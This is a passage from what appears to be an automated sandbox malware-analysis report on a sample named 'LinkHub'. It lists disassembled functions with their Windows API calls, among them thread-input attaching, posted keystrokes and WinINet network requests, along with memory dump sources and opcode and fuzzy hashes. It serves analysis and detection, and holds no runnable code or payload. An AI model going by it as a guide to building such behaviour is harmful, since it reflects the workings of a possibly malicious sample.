                                                                                        • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00262990
                                                                                        • GetDlgCtrlID.USER32 ref: 0026299B
                                                                                        • GetParent.USER32 ref: 002629B7
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 002629BA
                                                                                        • GetDlgCtrlID.USER32(?), ref: 002629C3
                                                                                        • GetParent.USER32(?), ref: 002629D7
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 002629DA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 711023334-1403004172
                                                                                        • Opcode ID: a1396dd8b6a33eeed15bc0f079c8da5c6e400a0550c4c3f05883ab7e9c240ffd
                                                                                        • Instruction ID: ce6de759ec76f37e81f000fc569916e6866e04adc7b3a06478a83c29930323ea
                                                                                        • Opcode Fuzzy Hash: a1396dd8b6a33eeed15bc0f079c8da5c6e400a0550c4c3f05883ab7e9c240ffd
                                                                                        • Instruction Fuzzy Hash: 0E21C375D10218BBCF11AFA0DC89EEEBBB8EF05340F104156B991A7191CB755869EF60
                                                                                        Function 002944BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00294539
                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 0029453C
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00294563
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00294586
                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002945FE
                                                                                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00294648
                                                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00294663
                                                                                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 0029467E
                                                                                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00294692
                                                                                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 002946AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$LongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 312131281-0
                                                                                        • Opcode ID: e49db172062362bd8cf2ef43783c977e7249033d0b1e11e3f153cae16c83b0af
                                                                                        • Instruction ID: 1c989241b0180a38f7c38d03b305023c60e21b65153372a9eddcd4c252210a61
                                                                                        • Opcode Fuzzy Hash: e49db172062362bd8cf2ef43783c977e7249033d0b1e11e3f153cae16c83b0af
                                                                                        • Instruction Fuzzy Hash: DA615BB5A10209AFDB10DFA4CC85EEE77B8EF0A710F10015AFA14E72A1D774AD56DB50
                                                                                        Function 0026BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0026BB18
                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0026ABA8,?,00000001), ref: 0026BB2C
                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0026BB33
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0026ABA8,?,00000001), ref: 0026BB42
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0026BB54
                                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0026ABA8,?,00000001), ref: 0026BB6D
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0026ABA8,?,00000001), ref: 0026BB7F
                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0026ABA8,?,00000001), ref: 0026BBC4
                                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0026ABA8,?,00000001), ref: 0026BBD9
                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0026ABA8,?,00000001), ref: 0026BBE4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                        • String ID:
                                                                                        • API String ID: 2156557900-0
                                                                                        • Opcode ID: f901c9377a209ffc682c73f337f5e853c006f3929432b1c37b5b4af38212beed
                                                                                        • Instruction ID: 69c888e9e24d4fbee0f7109ae27c25df7167c7dd06cbe968a7e223cc41cfb8a9
                                                                                        • Opcode Fuzzy Hash: f901c9377a209ffc682c73f337f5e853c006f3929432b1c37b5b4af38212beed
                                                                                        • Instruction Fuzzy Hash: A131BD7A915205AFDB16AF24FCCCF79B7A9AB0535AF108006FE05D71A0C7B49CC08B60
                                                                                        Function 00278835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002789F2
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00278A06
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00278A30
                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00278A4A
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00278A5C
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00278AA5
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00278AF5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$AttributesFile
                                                                                        • String ID: *.*
                                                                                        • API String ID: 769691225-438819550
                                                                                        • Opcode ID: 33ad4f795b715648ba3d621d65293776b25cf3afbdcabfc9ee208c91d5899e8b
                                                                                        • Instruction ID: d0db051ea92ead3f352f4fb02f27b08edc0dc860303ad8a5f23e3966b25ba67e
                                                                                        • Opcode Fuzzy Hash: 33ad4f795b715648ba3d621d65293776b25cf3afbdcabfc9ee208c91d5899e8b
                                                                                        • Instruction Fuzzy Hash: 9181C172964306DBCB20EF54C448ABAB3E8BF84310F58881AF989D7251DF74D965CB93
                                                                                        Function 002988F9 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsWindow.USER32(00000000), ref: 00298992
                                                                                        • IsWindowEnabled.USER32(00000000), ref: 0029899E
                                                                                        • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00298A79
                                                                                        • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00298AAC
                                                                                        • IsDlgButtonChecked.USER32(?,00000000), ref: 00298AE4
                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 00298B06
                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00298B1E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                        • String ID: (-
                                                                                        • API String ID: 4072528602-4239615555
                                                                                        • Opcode ID: 1e07340dbbfbe90c38bea106db0416660d90235793e8c3859013ea7e69a3cea3
                                                                                        • Instruction ID: 7b2a40095a024366e126807d4c9da620f64e357a722531e22c86983dd1f99331
                                                                                        • Opcode Fuzzy Hash: 1e07340dbbfbe90c38bea106db0416660d90235793e8c3859013ea7e69a3cea3
                                                                                        • Instruction Fuzzy Hash: AB719F74610206AFEF21DF64C894FBABBB9FF1A300F18045AE845A7361CB31AD64DB51
                                                                                        Function 00207447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 002074D7
                                                                                          • Part of subcall function 00207567: GetClientRect.USER32(?,?), ref: 0020758D
                                                                                          • Part of subcall function 00207567: GetWindowRect.USER32(?,?), ref: 002075CE
                                                                                          • Part of subcall function 00207567: ScreenToClient.USER32(?,?), ref: 002075F6
                                                                                        • GetDC.USER32 ref: 00246083
                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00246096
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 002460A4
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 002460B9
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 002460C1
                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00246152
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                        • String ID: U
                                                                                        • API String ID: 4009187628-3372436214
                                                                                        • Opcode ID: cc4b4dd5067b248274e37de75725e02b533a294952cbb8e5c116e7868c17167b
                                                                                        • Instruction ID: a42a6701786e982b416c5bc955f2a2560a4f16619d77b3f6263448bc0a3000c7
                                                                                        • Opcode Fuzzy Hash: cc4b4dd5067b248274e37de75725e02b533a294952cbb8e5c116e7868c17167b
                                                                                        • Instruction Fuzzy Hash: 4A71E330920206DFCF298F64D888AFA7BB5FF46310F14426AED595A2A7C7319C60DF61
                                                                                        Function 0027CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0027CCB7
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0027CCDF
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0027CD0F
                                                                                        • GetLastError.KERNEL32 ref: 0027CD67
                                                                                        • SetEvent.KERNEL32(?), ref: 0027CD7B
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0027CD86
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                        • String ID:
                                                                                        • API String ID: 3113390036-3916222277
                                                                                        • Opcode ID: 1e2ad11f30cc7dbfbe739487e9fce7a969d0392141fb38998f98ad1b4fe67cf8
                                                                                        • Instruction ID: ab08b9f24d5467ccf5577e3522fcfff4ac7d0a9fe81fee7778d67358ef236be3
                                                                                        • Opcode Fuzzy Hash: 1e2ad11f30cc7dbfbe739487e9fce7a969d0392141fb38998f98ad1b4fe67cf8
                                                                                        • Instruction Fuzzy Hash: 66317FB1520205AFD731AF75DC89AAB7BFCEF45740B20852EF84A92200DB34ED149B61
                                                                                        Function 0026A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,002455AE,?,?,Bad directive syntax error,0029DCD0,00000000,00000010,?,?), ref: 0026A236
                                                                                        • LoadStringW.USER32(00000000,?,002455AE,?), ref: 0026A23D
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0026A301
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadMessageModuleString_wcslen
                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                        • API String ID: 858772685-4153970271
                                                                                        • Opcode ID: d462b10745a8445ebf7abb2f2deeb73dc69e21972fba43a5bcaf240d31ad87a2
                                                                                        • Instruction ID: deab0dac1ff73df7753d15f91b43fe00e0b3579b1a010b14d644c4d6a6bd14be
                                                                                        • Opcode Fuzzy Hash: d462b10745a8445ebf7abb2f2deeb73dc69e21972fba43a5bcaf240d31ad87a2
                                                                                        • Instruction Fuzzy Hash: AC21613182035AEBCF11AF90CC0AEEE7B79BF18704F004459B515750A2D7719578EF51
                                                                                        Function 002629EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetParent.USER32 ref: 002629F8
                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00262A0D
                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00262A9A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameParentSend
                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                        • API String ID: 1290815626-3381328864
                                                                                        • Opcode ID: c7b8a8c5ad539ab0a4636dd61f007365a2fe7fb79d4684d03c5963b233031cfe
                                                                                        • Instruction ID: 78a30eb51257a7e01f7fee7363f650079a180f9f65396106ec464bfed0837a82
                                                                                        • Opcode Fuzzy Hash: c7b8a8c5ad539ab0a4636dd61f007365a2fe7fb79d4684d03c5963b233031cfe
                                                                                        • Instruction Fuzzy Hash: A11125766B8B17F9FA247AA0FC0BEA6779C8F15728B200116F904F50D1FBE1ACB45914
                                                                                        Function 00207567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetClientRect.USER32(?,?), ref: 0020758D
                                                                                        • GetWindowRect.USER32(?,?), ref: 002075CE
                                                                                        • ScreenToClient.USER32(?,?), ref: 002075F6
                                                                                        • GetClientRect.USER32(?,?), ref: 0020773A
                                                                                        • GetWindowRect.USER32(?,?), ref: 0020775B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                        • String ID:
                                                                                        • API String ID: 1296646539-0
                                                                                        • Opcode ID: 695bf9b8be105b01b58cba5695a5c091c519ef9481136a47f0ffbae4460261f2
                                                                                        • Instruction ID: 4a85167ee0fdddd6e5e7b2901b2500813ccbeb6a5c2ef95ec8ff4f02c10cbfd7
                                                                                        • Opcode Fuzzy Hash: 695bf9b8be105b01b58cba5695a5c091c519ef9481136a47f0ffbae4460261f2
                                                                                        • Instruction Fuzzy Hash: 86C17C7992474AEFDB10CFA8C444BEDBBF5FF08310F14841AE89AA3250D774A960DB61
                                                                                        Function 0023D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                        • String ID:
                                                                                        • API String ID: 1282221369-0
                                                                                        • Opcode ID: f3abaf8c8c4b907eeb82474ced06f6b790913cde6d0539d2b785fb8a11cbf060
                                                                                        • Instruction ID: 6ad7400deccd92d40069c892a84265de321a05299a850f00e78aedbadfe75ce2
                                                                                        • Opcode Fuzzy Hash: f3abaf8c8c4b907eeb82474ced06f6b790913cde6d0539d2b785fb8a11cbf060
                                                                                        • Instruction Fuzzy Hash: EB6128F1E21306AFDB21AF74F885AAE7BA4AF01720F1401AEED45A7242D731DC348B51
                                                                                        Function 0027CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0027CBC7
                                                                                        • GetLastError.KERNEL32 ref: 0027CBDA
                                                                                        • SetEvent.KERNEL32(?), ref: 0027CBEE
                                                                                          • Part of subcall function 0027CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0027CCB7
                                                                                          • Part of subcall function 0027CC98: GetLastError.KERNEL32 ref: 0027CD67
                                                                                          • Part of subcall function 0027CC98: SetEvent.KERNEL32(?), ref: 0027CD7B
                                                                                          • Part of subcall function 0027CC98: InternetCloseHandle.WININET(00000000), ref: 0027CD86
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                        • String ID:
                                                                                        • API String ID: 337547030-0
                                                                                        • Opcode ID: edc10efaf2335ffa95cbc10e1d584652e505631c45c56a36078dedc6203aa6b1
                                                                                        • Instruction ID: 31176ada92d131b6b942bf0ce7ff78245426b898dedbdf3515b112f2421fe75d
                                                                                        • Opcode Fuzzy Hash: edc10efaf2335ffa95cbc10e1d584652e505631c45c56a36078dedc6203aa6b1
                                                                                        • Instruction Fuzzy Hash: 8E318E71510706AFDB229FB1DD49A6BBBF8FF04304B24852EF95E86610C731E824EB60
                                                                                        Function 00262EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00264393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002643AD
                                                                                          • Part of subcall function 00264393: GetCurrentThreadId.KERNEL32 ref: 002643B4
                                                                                          • Part of subcall function 00264393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00262F00), ref: 002643BB
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00262F0A
                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00262F28
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00262F2C
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00262F36
                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00262F4E
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00262F52
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00262F5C
                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00262F70
                                                                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00262F74
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2014098862-0
                                                                                        • Opcode ID: 19f4e4f159b34f93cd215aca181ed32a51e567a09bff8187fb4d37d0fc6b8bfe
                                                                                        • Instruction ID: 15abe14417b9c16fabebf940a6ccdef76e41aec4690b677d10d40d3015eaa949
                                                                                        • Opcode Fuzzy Hash: 19f4e4f159b34f93cd215aca181ed32a51e567a09bff8187fb4d37d0fc6b8bfe
                                                                                        • Instruction Fuzzy Hash: F301D431794610BBFB106768EC8EF593F5AEB4DB11F200012F358AF1E0C9E264549EA9
                                                                                        Function 00262150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00261D95,?,?,00000000), ref: 00262159
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00261D95,?,?,00000000), ref: 00262160
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00261D95,?,?,00000000), ref: 00262175
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00261D95,?,?,00000000), ref: 0026217D
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00261D95,?,?,00000000), ref: 00262180
